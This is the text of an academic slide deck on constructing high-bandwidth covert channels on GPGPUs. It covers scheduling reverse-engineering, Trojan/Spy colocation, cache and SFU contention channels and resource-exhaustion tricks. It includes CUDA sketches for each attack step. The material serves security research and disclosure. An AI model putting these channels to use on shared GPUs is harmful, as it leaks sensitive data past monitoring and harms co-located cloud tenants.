Constructing and Characterizing Covert Channels on GPGPUs
Hoda NaghibiJouybari, Khaled N. Khasawneh, and Nael Abu-Ghazaleh

Covert Channel
Malicious, indirect communication of sensitive data. Why?
There is no legitimate communication channel, or
The communication channel is monitored.
A covert channel is undetectable by monitoring systems on conventional communication channels.
[Figure: a Trojan (Gallery App) leaks data to a Spy (Weather App) over a covert channel.]

Covert channels are a substantial threat on GPGPUs
Trends toward improved multiprogramming on GPGPUs.
GPU-accelerated computing is available on major cloud platforms.
No protection is offered by the operating system.
High quality (low noise) and high bandwidth.

Overview
Threat: using GPGPUs for covert channels.
To demonstrate the threat, we construct error-free, high-bandwidth covert channels on GPGPUs:
Reverse engineer scheduling at different levels on the GPU.
Exploit scheduling to force colocation of two applications.
Create contention on shared resources.
Remove noise.
Key result: error-free covert channels with bandwidth of over 4 Mbps.

GPU Architecture
Intra-SM channels: L1 constant cache, functional units, and warp schedulers.
Inter-SM channels: L2 constant cache, global memory.

Attack Flow
1. Colocate Spy and Trojan
2. Construct the Channels
3. Remove Noise

Colocation (Reverse Engineering the Scheduling)
Step 1: Thread block scheduling to the SMs.
[Figure: thread blocks TB0..TBn of Kernel 1 and Kernel 2 pass through the GPU thread block scheduler onto SM0..SMm under the leftover policy; the SMs share an interconnection network, the L2 cache, and the memory channels.]
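
A minimal sketch of how this placement can be observed, assuming an illustrative kernel name, block count, and launch shape: each block reads the ID of the SM it runs on through the PTX special register %smid, so launching two such kernels concurrently reveals which blocks the scheduler colocates.

    #include <cstdio>
    #include <cuda_runtime.h>

    // Read the ID of the SM the calling thread executes on (%smid).
    __device__ unsigned int smid() {
        unsigned int id;
        asm volatile("mov.u32 %0, %%smid;" : "=r"(id));
        return id;
    }

    // Each block records the SM it landed on; comparing the records of two
    // concurrently launched kernels exposes the scheduler's placement.
    __global__ void record_sm(unsigned int *block_to_sm) {
        if (threadIdx.x == 0)
            block_to_sm[blockIdx.x] = smid();
    }

    int main() {
        const int nblocks = 32;                  // illustrative block count
        unsigned int *d_map, h_map[nblocks];
        cudaMalloc(&d_map, nblocks * sizeof(unsigned int));
        record_sm<<<nblocks, 32>>>(d_map);
        cudaMemcpy(h_map, d_map, sizeof(h_map), cudaMemcpyDeviceToHost);
        for (int b = 0; b < nblocks; ++b)
            printf("block %d -> SM %u\n", b, h_map[b]);
        cudaFree(d_map);
        return 0;
    }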

Step 2: Warp to warp scheduler mapping.
[Figure: within SMk, the warps W0..Wk of thread blocks TBi and TBj are distributed across the SM's warp schedulers; each scheduler's dispatch unit issues to the register file, SP and DP units, load/store units, and SFUs, backed by the shared memory / L1 cache.]
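
One way to probe this mapping, sketched below under illustrative assumptions (kernel name, pair selection, iteration count; host-side launch code elided): run only two of a block's warps at a time on an SFU-bound burst and time each. Pairs that inflate each other's timings are inferred to share a warp scheduler.

    // Only the two warps under test (wa, wb) run the burst; the rest exit.
    // Launch once per pair, e.g. time_warp_pair<<<1, 8 * 32>>>(a, b, ...).
    __global__ void time_warp_pair(int wa, int wb, unsigned long long *cycles,
                                   volatile float *sink) {
        int warp = threadIdx.x / warpSize;
        if (warp != wa && warp != wb) return;
        float x = (float)threadIdx.x;
        unsigned long long t0 = clock64();
        for (int i = 0; i < 1000; ++i)
            x = __sinf(x);                       // SFU-bound work
        if (threadIdx.x % warpSize == 0)
            cycles[warp] = clock64() - t0;       // inflated pair => same scheduler
        *sink = x;                               // keep the computation live
    }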

Attack Flow
1. Colocate Spy and Trojan
2. Construct the Channels
3. Remove Noise

Cache Channel (intra-SM and inter-SM)
Extract the cache parameters (cache size, number of sets, number of ways, and line size) using a latency plot.
Communicate through one cache set:
To send "1", the Trojan accesses its data array (TD), evicting the Spy's data array (SD) from constant cache set x; the Spy's probe misses and observes higher latency.
To send "0", the Trojan does not access the set; the Spy's probe hits and observes low latency.
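
A hedged sketch of the Spy's probe; the array size, set stride, way count, and latency threshold are illustrative placeholders, not measured parameters, and the host-side driver is elided.

    __constant__ int spy_data[2048];         // Spy's array (SD) in constant memory

    // Probe the agreed-upon set: touch one line per way and time the loads.
    // If the Trojan evicted the set, the loads miss and the latency crosses
    // the threshold, decoding as "1".
    __device__ int probe_bit(volatile int *sink, int set_stride, int ways,
                             unsigned long long threshold) {
        int sum = 0;
        unsigned long long t0 = clock64();
        for (int w = 0; w < ways; ++w)
            sum += spy_data[w * set_stride];  // one line per way of the set
        unsigned long long t1 = clock64();
        *sink = sum;                          // keep the loads live
        return (t1 - t0) > threshold;         // high latency => "1"
    }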

Synchronization: L1 Constant Cache
[Figure: the Trojan and Spy handshake through ReadyToSend and ReadyToReceive flags; once both are set, threads 0-5 transmit one bit each, so the Spy receives 6 bits (e.g., ...011001) per round.]
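
A minimal sketch of such a handshake, assuming flags in global memory; the flag names follow the slide, and the spin-loop layout is illustrative.

    // Trojan side: announce staged bits, then wait for the Spy.
    __device__ void trojan_handshake(volatile int *ready_to_send,
                                     volatile int *ready_to_receive) {
        *ready_to_send = 1;                 // bits are staged
        while (*ready_to_receive == 0) ;    // spin until the Spy is ready
        // ...threads 0-5 now transmit their 6 bits in parallel...
    }

    // Spy side: wait for staged bits, then signal readiness and probe.
    __device__ void spy_handshake(volatile int *ready_to_send,
                                  volatile int *ready_to_receive) {
        while (*ready_to_send == 0) ;       // spin until bits are staged
        *ready_to_receive = 1;
        // ...threads 0-5 now probe and decode their 6 bits...
    }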

Synchronization and Parallelization
[Figure: the channel is replicated across SM 0 .. SM n to communicate bits in parallel GPU-wide.]

SFU and Warp Scheduler Channel (intra-SM)
The number of operations issued each cycle is limited by:
The type and number of functional units.
The issue bandwidth of the warp schedulers.
Contention is isolated to warps assigned to the same warp scheduler.
[Figure: Kepler SM.]

SFU and Warp Scheduler Channel (intra-SM)
Base channel:
Trojan: issues operations to the target functional unit to create contention, sending "1"; issues no operations to send "0".
Spy: issues operations to the target functional unit and measures the time. Low latency: "0"; high latency: "1".
Improved bandwidth:
Parallelism at the warp scheduler level: communicate different bits through warps assigned to different warp schedulers.
Parallelism at the SM level.
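
A hedged sketch of the base channel; the iteration counts, the threshold, and the choice of __sinf as the SFU-bound operation are illustrative, and the per-bit synchronization (see the handshake above) is elided. The two kernels would run concurrently from separate processes.

    // Trojan: saturate the SFUs to send "1"; stay idle to send "0".
    __global__ void trojan_sfu(const int *msg, int nbits, volatile float *sink) {
        float x = 1.0f;
        for (int b = 0; b < nbits; ++b) {
            if (msg[b])
                for (int i = 0; i < 10000; ++i)
                    x = __sinf(x);               // SFU contention => "1"
            // (handshake with the Spy between bits)
        }
        *sink = x;
    }

    // Spy: time a fixed SFU burst; contention from the Trojan inflates it.
    __global__ void spy_sfu(int *bits, int nbits, unsigned long long threshold,
                            volatile float *sink) {
        float x = 1.0f;
        for (int b = 0; b < nbits; ++b) {
            unsigned long long t0 = clock64();
            for (int i = 0; i < 1000; ++i)
                x = __sinf(x);
            bits[b] = (clock64() - t0) > threshold;  // high latency => "1"
            // (handshake with the Trojan between bits)
        }
        *sink = x;
    }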

Attack Flow
1. Colocate Spy and Trojan
2. Construct the Channels
3. Remove Noise

What about other concurrent applications colocated with the Spy and Trojan?
[Figure: Rodinia workloads (Back Propagation, Kmeans, Heart Wall, K-Nearest Neighbor, ...) competing for the GPU's SMs.]

Exclusive Colocation of Spy and Trojan
Exploit the concurrency limits of the GPU hardware (leftover policy):
Shared memory
Registers
Number of thread blocks
By sizing the Spy's and Trojan's thread blocks to exhaust these resources, no resources are left on their SMs for other kernels (see the sketch below).
This prevented interference from Rodinia benchmark workloads on the covert communication and achieved error-free communication in all cases.
[Figure: the Spy's and Trojan's thread blocks TB0..TBn consume the SM's shared memory and registers, leaving nothing for Kmeans, Back Propagation, Heart Wall, K-Nearest Neighbor, ...]
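
A minimal sketch of pinning an SM's resources through shared memory alone; the block size is illustrative, and a real implementation may also need to saturate registers and the per-SM block limit.

    #include <cuda_runtime.h>

    // Each block claims the full per-block dynamic shared memory budget; the
    // covert-channel work would run inside while the block pins the SM.
    __global__ void occupy(volatile char *sink) {
        extern __shared__ char pad[];
        pad[threadIdx.x] = (char)threadIdx.x;  // touch the allocation
        if (threadIdx.x == 0)
            *sink = pad[0];
    }

    int main() {
        cudaDeviceProp prop;
        cudaGetDeviceProperties(&prop, 0);
        char *sink;
        cudaMalloc(&sink, 1);
        // One block per SM, each with the maximum shared memory per block.
        occupy<<<prop.multiProcessorCount, 128, prop.sharedMemPerBlock>>>(sink);
        cudaDeviceSynchronize();
        cudaFree(sink);
        return 0;
    }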

Results
Error-free bandwidth of over 4 Mbps: the fastest known microarchitectural covert channel under realistic conditions.
[Figure: L1 cache covert channel bandwidth on three generations of real NVIDIA GPUs, with annotated gains of 12.9x, 3.8x, and 1.7x.]

Results
[Figure: SFU covert channel bandwidth on three generations of real NVIDIA GPUs, with annotated gains of 13x and 3.5x.]

Conclusion
GPUs' improved multiprogramming support makes covert channels a substantial threat.
We achieve colocation at different levels by leveraging thread block scheduling and the warp to warp scheduler mapping.
The GPU's inherent parallelism and specific architectural features provide very high quality, high bandwidth channels: over 4 Mbps error-free.

Thank You!